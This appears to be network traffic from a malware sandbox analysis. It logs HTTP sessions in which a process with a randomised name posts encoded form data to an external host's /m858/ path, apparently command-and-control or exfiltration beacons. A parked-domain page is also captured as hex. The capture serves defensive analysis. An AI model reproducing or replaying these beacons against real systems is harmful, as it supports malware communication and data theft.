                                                                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f 6f 74 73 74 72 61 70 2f 33 2e 33 2e 37 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 20 72 65 6c 3d 73 74 79 6c 65 73 68 65 65 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 68 74 74 70 73 3a 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 33 2e 32 2e 31 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f 6f 74 73 74 72 61 70 2f 33 2e 33 2e 37 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3e 3c 2f 73 63 72 69 70 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 35 2e 33 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 20 72 65 6c 3d 73 74 79 6c 65 73 68 65 65 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 26 73 75 62 73 65 74 3d 63 79 72 69 6c 6c 69 63 2c 63 79 72 69 6c 6c 69 63 2d 65 78 74 2c 67 72 65 65 6b 2c 67 72 65 65 6b 2d 65 78 74 2c 6c 61 74 69 6e 2d 65 78 74 2c 76 69 65 74 6e 61 6d 65 73 65 22 20 72 65 6c 3d 73 74 79 6c 65 73 68 65 65 74 3e 3c 73 74 79 6c 65 3e 68 74 6d 6c 7b 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b
                                                                                                                      Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;
                                                                                                                      Dec 7, 2023 15:52:47.668822050 CET1286INData Raw: 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 30 2e 37 64 65 67 2c 23 65 39 65 64 66 62 20 2d 35 30 2e 32 31 25 2c 23 66 36 66 38 66 64 20 33 31 2e 31 31 25 2c 23 66 66 66 20 31 36 36 2e 30 32 25 29 7d 68 31
                                                                                                                      Data Ascii: background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:600}h3{font-size:22px;font-w
                                                                                                                      Dec 7, 2023 15:52:47.668890953 CET1286INData Raw: 76 3e 6c 69 3e 61 20 69 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 2d 62 61 72 20 69 6d 67 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74 6f 70 3a 33 70 78 7d 2e 63 6f 6e 67 72 61 74 7a 7b 6d 61 72 67 69 6e 3a
                                                                                                                      Data Ascii: v>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;line-height:32px;margin-bo
                                                                                                                      Dec 7, 2023 15:52:47.669006109 CET1286INData Raw: 31 36 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 32 30 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61
                                                                                                                      Data Ascii: 16px;min-height:20px;min-width:20px;vertical-align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width:100%;padding:35px 0}
                                                                                                                      Dec 7, 2023 15:52:47.669086933 CET1286INData Raw: 3e 3c 69 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 74 72 75 65 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 67 72 61 64 75 61 74 69 6f 6e 2d 63 61 70 22 3e 3c 2f 69 3e 20 54 75 74 6f 72 69 61 6c 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68
                                                                                                                      Data Ascii: ><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href=https://www.hostinger.com/aff
                                                                                                                      Dec 7, 2023 15:52:47.669236898 CET1286INData Raw: 63 65 73 73 66 75 6c 20 6f 6e 6c 69 6e 65 20 70 72 6f 6a 65 63 74 73 2e 3c 2f 70 3e 3c 62 72 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d 20 72 65 6c 3d 6e 6f 66 6f 6c 6c 6f 77 3e 46 69 6e
                                                                                                                      Data Ascii: cessful online projects.</p><br><a href=https://www.hostinger.com rel=nofollow>Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Add website to your hostin
                                                                                                                      Dec 7, 2023 15:52:47.669281006 CET1286INData Raw: 6e 3c 74 3b 29 7b 69 66 28 35 35 32 39 36 3d 3d 28 36 33 34 38 38 26 28 72 3d 6f 5b 6e 2b 2b 5d 29 29 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28 65 6e 63 6f 64 65 29 3a 20 49 6c 6c 65 67 61 6c 20 55
                                                                                                                      Data Ascii: n<t;){if(55296==(63488&(r=o[n++])))throw new RangeError("UTF-16(encode): Illegal UTF-16 value");65535<r&&(r-=65536,e.push(String.fromCharCode(r>>>10&1023|55296)),r=56320|1023&r),e.push(String.fromCharCode(r))}return e.join("")}};var o=36,r=214
                                                                                                                      Dec 7, 2023 15:52:47.669322968 CET1286INData Raw: 69 66 28 74 29 66 6f 72 28 66 3d 30 2c 77 3d 6d 2e 6c 65 6e 67 74 68 3b 66 3c 77 3b 66 2b 2b 29 79 5b 66 5d 26 26 28 6d 5b 66 5d 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6d 5b 66 5d 29 2e 74 6f 55 70 70 65 72 43 61 73 65 28
                                                                                                                      Data Ascii: if(t)for(f=0,w=m.length;f<w;f++)y[f]&&(m[f]=String.fromCharCode(m[f]).toUpperCase().charCodeAt(0));return this.utf16.encode(m)},this.encode=function(t,a){var h,f,i,c,u,d,l,p,g,s,C,w;a&&(w=this.utf16.decode(t));var v=(t=this.utf16.decode(t.toLo
                                                                                                                      Dec 7, 2023 15:52:47.669357061 CET88INData Raw: 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 70 61 74 68 4e 61 6d 65 22 29 3b 61 63 63 6f 75 6e 74 2e 69 6e 6e 65 72 48 54 4d 4c 3d 70 75 6e 79 63 6f 64 65 2e 54 6f 55 6e 69 63 6f 64 65 28 70 61 74 68 4e 61 6d 65 29 3c 2f 73
                                                                                                                      Data Ascii: ument.getElementById("pathName");account.innerHTML=punycode.ToUnicode(pathName)</script>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      1192.168.2.1149711103.210.56.141802016C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 15:53:04.260973930 CET731OUTPOST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.fortunetravelsltd.com
                                                                                                                      Origin: http://www.fortunetravelsltd.com
                                                                                                                      Referer: http://www.fortunetravelsltd.com/m858/
                                                                                                                      Content-Length: 184
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 79 52 56 3d 55 52 4f 52 55 4c 4f 6c 58 72 42 39 6a 44 74 37 6c 43 65 47 53 4e 67 31 77 31 6f 31 45 52 32 79 39 50 4a 46 4f 55 68 72 41 75 6c 71 69 71 37 71 70 51 4d 58 67 56 32 37 6d 69 31 44 32 61 7a 35 59 77 4b 57 64 66 4e 72 75 75 69 50 68 36 4a 42 35 4e 50 43 42 4d 51 77 50 31 65 76 6a 61 53 53 6a 73 42 32 6f 48 55 78 43 54 32 6a 36 4f 5a 4f 43 65 76 59 2b 77 62 78 2b 2b 47 66 47 69 59 2f 4c 64 46 77 48 45 5a 42 50 38 54 30 34 4b 4f 78 79 36 54 44 51 53 4b 45 38 6c 71 33 41 46 32 74 5a 79 57 5a 66 4a 48 6d 50 76 77 30 4f 68 58 4e 45 51 3d 3d
                                                                                                                      Data Ascii: yRV=URORULOlXrB9jDt7lCeGSNg1w1o1ER2y9PJFOUhrAulqiq7qpQMXgV27mi1D2az5YwKWdfNruuiPh6JB5NPCBMQwP1evjaSSjsB2oHUxCT2j6OZOCevY+wbx++GfGiY/LdFwHEZBP8T04KOxy6TDQSKE8lq3AF2tZyWZfJHmPvw0OhXNEQ==
                                                                                                                      Dec 7, 2023 15:53:05.381544113 CET1286INHTTP/1.1 404 Not Found
                                                                                                                      Connection: close
                                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                      link: <https://fortunetravelsltd.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                      transfer-encoding: chunked
                                                                                                                      content-encoding: br
                                                                                                                      vary: Accept-Encoding
                                                                                                                      date: Thu, 07 Dec 2023 14:53:04 GMT
                                                                                                                      server: LiteSpeed
                                                                                                                      referrer-policy: no-referrer-when-downgrade
                                                                                                                      Data Raw: 37 66 37 0d 0a e0 9b 02 80 fc ad e5 7f bf 4e 36 2b 2a 56 b7 49 15 27 02 a2 51 ef d0 f3 f0 87 3d c2 51 a9 a0 58 80 19 de e0 ff 77 ef bf 68 1f f4 03 45 ac 2e 8f 86 ce dc b9 bf 55 4a ed d6 da cc d9 a7 a4 f6 66 d1 18 94 52 3d 1a 81 a7 31 0b 00 c6 86 38 73 0f 87 86 32 5e b2 4e 52 04 1c cd fb fe 75 4a b3 5b c4 f0 66 ea a6 8c 82 29 cd 0e 16 67 3b 2c dc ad 41 f2 ad b8 6c db cd 61 f5 d1 26 eb 17 48 7e f5 d1 ef 02 17 f8 df 7f 0e 64 0d 38 d8 c7 db c1 8f 1d 99 52 5a bb a2 f0 e3 7a 9e b1 58 62 46 86 fe 6a f3 62 e8 b3 bf ac 98 9f 5d 21 02 d5 79 eb 09 97 f4 76 f8 e5 87 37 34 23 1e 48 41 1c ff 7a 65 29 f0 df a0 41 b6 38 cc 96 06 68 0e 48 13 2d 6a c6 b7 c3 3c 48 b9 c6 7f 10 3f c7 9b 55 17 a3 e4 7f d8 cf 00 51 2b 87 6f 5c a2 57 49 36 39 7c ff 5b 8d 48 16 9f c8 71 78 fd 15 5f 66 8d e0 fc 85 fc f8 d7 bf ff fd df 9f 3f 90 ff fe fb cd ff 7f f8 fd 3f e4 f7 ff 7e bf 40 db 0d f7 bb dd ee 35 a6 a7 c3 f7 dd 9b fa fd 87 37 1b 7c 98 b3 98 ac be 3e dd fe 90 30 f8 30 13 bb ac 5b ea 3a 98 fd 07 58 9d d2 38 79 67 30 7c 24 6d da cd 87 f1 e5 8f f2 47 f9 e3 cb 77 56 ca 67 02 dc 1e e1 53 25 fa c2 db dd 9c 84 77 ec af 36 3d 1b 88 5d 01 80 67 4c f8 48 2a a0 ba 5f f4 e4 9a 75 96 0e b9 f3 b5 88 09 8a 8f 24 48 67 c9 83 ef 7d 8a f9 a4 b8 59 3e ab 07 d8 59 8d 08 6b 11 ac 8e f7 6e 27 2e 3f 49 4e 8a f7 fd ab b3 cb 95 04 74 6f b9 59 22 9c ea 00 5b 49 7a ca d7 2e f9 51 28 8a c1 87 b4 2d 98 82 ba a1 8b 2e 99 b3 f6 33 f9 87 68 8b 78 1e fc 92 d4 1d a3 9f f1 e6 e8 e2 f9 7e f6 61 24 98 8f 43 02 3b 5a ad 92 f5 4b 91 c8 d0 84 6a 26 cb 24 ee 8b fc 88 68 7e 04 ba 3c b1 d3 f5 5f 59 0c 88 a6 38 c8 d2 e7 3b 3f c7 83 95 50 31 8b a7 d2 51 fc cd cf 6b 6a cf 90 65 9a f6 bb af 90 41 3f 65 b1 ad ce 2b 13 0b c1 04 2b 58 5b a4 74 5a 11 04 a3 53 24 f5 2d 1e 80 4e fc c3 bb fe bb dd 6e a5 91 cf f8 a3 0f c4 fe 3d f9 05 c9 bf 98 ec a2 c8 aa b6 7d 09 40 22 4b 5d 7a 83 75 75 08 c9 6f 7a 02 fd 88 46 fb 01 e3 db 81 37 ec c1 1b 26 fe c4 df a9 35 6d 01 8b ab d9 0e 12 cf b1 b7 59 7d 9e 5a 1f 38 4e 88 29 27 d6 bc e5 f7 f5 83 f7 33 44 af ad 72 d2 4d 13 a1 77 5e 5f 21 09 4f 00 3a c6 9c 04 ba 89 69 63 b5 91 03 c7 85 56 87 42 ff 04 b6 f5 05 a7 b1 85 b1 31 cd ef 79 81 38 f7 3d eb 18 bf ba 61 78 93 67 71 e6 32 f7 4e 7d be 09 23 e9 b2 dd 09 dd 6a ae 9c 9b 70 bc b2 0d 5a b7 4b 3b c2 0d 17 e3 43 54 b2 cf dd fb 30 1d 1e 34 16 05 6d f6 8d 82 6b 53 b1 2c c9 fc 14 52 94 7a fe 07 f0 ba 6a 2f b5 ac ab 8b ae 7f 67 d4 71 3e a2 6e 5d 58 12 35 05 e7 78 a3 f3 bd 72 70 4b 46 58 28 9a e8 38 fb 3c de fb be f7 e6 f9 11 e0 be 02 ec 58 4a 9f 04 b0 85 5a 1c 60 b7 67 87 74 24 63 6f e6 fd 32 ee db a1 9f 6a 81 de 6d 36 4e 30 06 f5 ec 48 a6 fa
                                                                                                                      Data Ascii: 7f7N6+*VI'Q=QXwhE.UJfR=18s2^NRuJ[f)g;,Ala&H~d8RZzXbFjb]!yv74#HAze)A8hH-j<H?UQ+o\WI69|[Hqx_f??~@57|>00[:X8yg0|$mGwVgS%w6=]gLH*_u$Hg}Y>Ykn'.?INtoY"[Iz.Q(-.3hx~a$C;ZKj&$h~<_Y8;?P1QkjeA?e++X[tZS$-Nn=}@"K]zuuozF7&5mY}Z8N)'3DrMw^_!O:icVB1y8=axgq2N}#jpZK;CT04mkS,Rzj/gq>n]X5xrpKFX(8<XJZ`gt$co2jm6N0H
                                                                                                                      Dec 7, 2023 15:53:05.381573915 CET1186INData Raw: be d1 25 c9 b4 f7 c9 26 ec 48 36 5c 08 2e be 01 ab 72 08 ab 5d ae 1d c9 86 4b 63 d4 65 ec 37 e0 66 6f d6 40 40 d3 91 4c 0f 02 05 9e cd e0 b6 d9 2e 7e 8b 44 b3 f9 d3 69 82 e4 58 ae ba 55 8d a3 7b 16 d5 dc 63 e8 48 36 e8 fe ea 1a 76 9c 12 8c 01 71
                                                                                                                      Data Ascii: %&H6\.r]Kce7fo@@L.~DiXU{cH6vqHv+A~~\3#Y?nK,aG8ycP.L*PyYi{u)*a_0G^UTy"/NY+')2B0vudW(,1(7eAEUQ
                                                                                                                      Dec 7, 2023 15:53:05.384138107 CET1286INData Raw: 37 37 33 0d 0a 28 0a 01 40 ee f7 ba fa 76 7f be 38 7f bc 36 98 a8 ab 5b da 95 5a 08 0c 11 25 0c c7 90 c4 ac ef ee 5b 7b 7d 3e 11 2e 3e ca c7 c5 c6 e9 81 0d de a5 44 3c b3 77 5c 20 56 00 a4 90 9c 01 22 63 fb fc 7e 57 f9 23 64 dd 17 5a f6 31 54 db
                                                                                                                      Data Ascii: 773(@v86[Z%[{}>.>D<w\ V"c~W#dZ1Tl>i '-B.+y_@#$2Y0r)3O5s,l%KYN8+?"x=B| !yJ@D8l]C}9y`3i)
                                                                                                                      Dec 7, 2023 15:53:05.384166956 CET628INData Raw: 53 e9 0f 99 85 51 13 d5 fe 42 1a 43 ec 69 11 77 5f 65 12 5c 97 52 25 ce a8 d4 51 c5 50 9e b9 40 cb 76 41 d5 a2 8c ce 74 98 00 a9 20 eb 7d 4b a3 4e 25 61 48 8b 73 61 48 b7 0d 86 2c ff 69 7c 34 96 03 bd 17 2b 30 a4 d5 a2 7c 08 31 31 2a 2b 68 19 93
                                                                                                                      Data Ascii: SQBCiw_e\R%QP@vAt }KN%aHsaH,i|4+0|11*+h1]IEuzGZb)1%Jb!V!#d%55XSi{jgz66(!"XND TqDSKZg&8|1?0=,AD Fm5yD"4T9nD
                                                                                                                      Dec 7, 2023 15:53:05.386013985 CET1155INData Raw: 34 37 63 0d 0a 30 1f 01 40 fe e6 ac af b1 a9 de 70 e5 1f 49 62 88 3f 84 54 73 bb e8 32 87 c0 08 ea fe ff c7 5e 00 29 e3 a4 1b 6f 19 f1 23 7b 6d c3 8d 37 ac 32 1f 8e 86 69 f0 eb f8 b0 04 07 24 b3 31 d4 fa 7b e8 0e e7 44 b0 79 00 4c 19 ca d0 10 8f
                                                                                                                      Data Ascii: 47c0@pIb?Ts2^)o#{m72i$1{DyL%CZ3$g`x,8C0|#fg5#7aNj_=Z-[=b#kv=TxRzNmv34V=G+3fc:+?=~#<Rm]l
                                                                                                                      Dec 7, 2023 15:53:05.402393103 CET1286INData Raw: 36 38 30 0d 0a 38 0e 01 40 ee 6d 93 fe 0c 97 d3 ec ac 68 d0 b4 0e 2b 62 df fb d2 12 20 bf 21 93 67 95 fb 3f 44 9f 87 a3 b4 c0 12 0b d1 ad cc 31 ee fe ff 19 6b da a0 74 2c 5e 80 05 8b 78 82 c5 22 cd 89 c5 8a f7 71 d8 f3 ff 3e 30 9a 94 44 b2 67 99
                                                                                                                      Data Ascii: 6808@mh+b !g?D1kt,^x"q>0Dg-XI>A `i/1;RJ2V@;/=~;@@Pl&NN>@l!e'H3Eop|[N@t$a5#1UmTx
                                                                                                                      Dec 7, 2023 15:53:05.402873039 CET385INData Raw: 90 ba de ae 5b aa 34 65 b7 3f 20 8e 20 0e 75 7f 83 e3 23 4f 73 ca d5 aa 56 84 5f 51 89 c4 16 60 6d 48 6d 5d 67 73 44 4c be 8b 49 cb 75 2e 33 72 2d 38 8d 50 be 8c 03 12 49 05 f1 41 00 6b 6e 1d 8d 52 b6 4c 31 26 a7 66 1c 42 ba 87 0f 02 a4 e7 50 ce
                                                                                                                      Data Ascii: [4e? u#OsV_Q`mHm]gsDLIu.3r-8PIAknRL1&fBP_nN?oh;TjAJZpP?G{T3Xv9:-^)]msfQ6ze:8"")C%xy#PZo7T=@gZnb,9@
                                                                                                                      Dec 7, 2023 15:53:05.410432100 CET1286INData Raw: 36 65 63 0d 0a f0 6a 01 40 7e 6d ea 9f 83 d4 c3 fd 89 8a 6e 87 67 9b 9d d1 fd c7 58 c8 01 03 6e cd 10 18 c8 ef bd 7b 6b 42 18 1e c2 9c b1 2b dc cc 24 e2 6f fe 75 c5 2e a5 14 55 27 c9 e4 e7 6f 69 a7 68 45 f6 a2 4a 77 27 24 4a 35 0f 46 62 64 f6 3b
                                                                                                                      Data Ascii: 6ecj@~mngXn{kB+$ou.U'oihEJw'$J5Fbd;P Ix,\!Bk"3;i]Vo3`-'~[xa6T(X:u767O&E x/LMJtFYj$qjPiZ]dS[RV
                                                                                                                      Dec 7, 2023 15:53:05.410453081 CET493INData Raw: cc f6 00 ee 47 30 74 18 73 d8 b3 38 29 bd f3 fc be 59 fc 85 6d af 4a 52 47 d0 fd 28 0f 43 bc a2 42 f8 96 07 c1 3e 08 96 0f 5d 09 41 30 5f 40 b4 07 50 c4 3d c5 44 2f 09 a0 88 0f 56 14 bb 81 fa 38 97 07 da 41 b8 59 8c a6 b5 93 94 78 d9 ff 40 b3 5d
                                                                                                                      Data Ascii: G0ts8)YmJRG(CB>]A0_@P=D/V8AYx@]z{Is]<Q],.KVreh (A/8FzdpIdZ|wr/@~a~|pH#_<OD9[q(:#1;VXhK
                                                                                                                      Dec 7, 2023 15:53:05.412870884 CET1286INData Raw: 38 62 32 0d 0a 98 03 01 40 2e 55 ad 5a 6a 2a 70 cf 81 f4 31 20 30 28 98 17 52 7a 79 38 20 b1 92 20 33 0d 01 05 bf 4e 65 f1 4d fb 57 fb bd 0a 15 97 89 17 75 76 e1 c4 83 5f 42 d8 db 83 00 b0 2b b2 65 54 55 64 74 65 c0 9a 9b aa da 2a d7 a9 12 95 3e
                                                                                                                      Data Ascii: 8b2@.UZj*p1 0(Rzy8 3NeMWuv_B+eTUdte*>>"J<]Ejinun{w>csnmt7k6puri#{aSz6qX0%fI)Mg1P\Y<b2Lpx#
                                                                                                                      Dec 7, 2023 15:53:05.788480043 CET1286INData Raw: 09 92 93 6a 3e 1e 8d 4e 9e eb cd c7 08 3e ec 8a b1 b6 71 44 81 15 17 68 d5 c4 aa 68 40 68 42 87 06 c3 b6 b5 ba 41 14 b5 1f 0d 99 08 a7 f0 e7 5c 4e 53 06 3b 65 11 7a ec be 0f fa ae be 5b 6a d8 4f 04 77 6a 05 4b 42 04 56 d2 49 c4 eb 8d 5a e5 97 53
                                                                                                                      Data Ascii: j>N>qDhh@hBA\NS;ez[jOwjKBVIZSWfx|0@KNdW0;ufxczYDC+4f@Ecp:y@1yK<SnE"seO!cZRT:eb Z`Qze1cy4W!&Dx,4


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      2192.168.2.1149712103.210.56.141802016C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 15:53:07.189815044 CET751OUTPOST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.fortunetravelsltd.com
                                                                                                                      Origin: http://www.fortunetravelsltd.com
                                                                                                                      Referer: http://www.fortunetravelsltd.com/m858/
                                                                                                                      Content-Length: 204
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 79 52 56 3d 55 52 4f 52 55 4c 4f 6c 58 72 42 39 69 6d 6c 37 70 44 65 47 44 39 67 32 38 56 6f 31 4f 78 33 37 39 50 46 46 4f 52 5a 37 48 62 39 71 69 4b 4c 71 34 69 30 58 74 31 32 37 75 43 31 47 72 71 7a 79 59 77 47 30 64 62 46 72 75 71 43 50 68 34 42 42 36 2b 6e 46 42 63 52 57 44 56 65 74 39 71 53 53 6a 73 42 32 6f 48 52 65 43 54 65 6a 36 2b 70 4f 46 4b 37 62 33 51 62 75 70 4f 47 66 43 69 59 37 4c 64 45 54 48 41 51 73 50 2b 72 30 34 4b 2b 78 79 72 54 4d 46 43 4b 47 68 31 72 43 50 31 33 53 63 6a 62 4e 4a 4a 6a 41 49 36 52 4c 47 55 37 65 44 6c 5a 69 4f 75 79 62 47 4d 73 41 30 51 50 79 68 64 52 49 7a 4d 30 3d
                                                                                                                      Data Ascii: yRV=URORULOlXrB9iml7pDeGD9g28Vo1Ox379PFFORZ7Hb9qiKLq4i0Xt127uC1GrqzyYwG0dbFruqCPh4BB6+nFBcRWDVet9qSSjsB2oHReCTej6+pOFK7b3QbupOGfCiY7LdETHAQsP+r04K+xyrTMFCKGh1rCP13ScjbNJJjAI6RLGU7eDlZiOuybGMsA0QPyhdRIzM0=
                                                                                                                      Dec 7, 2023 15:53:09.604619026 CET1286INHTTP/1.1 404 Not Found
                                                                                                                      Connection: close
                                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                      link: <https://fortunetravelsltd.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                      transfer-encoding: chunked
                                                                                                                      content-encoding: br
                                                                                                                      vary: Accept-Encoding
                                                                                                                      date: Thu, 07 Dec 2023 14:53:09 GMT
                                                                                                                      server: LiteSpeed
                                                                                                                      referrer-policy: no-referrer-when-downgrade
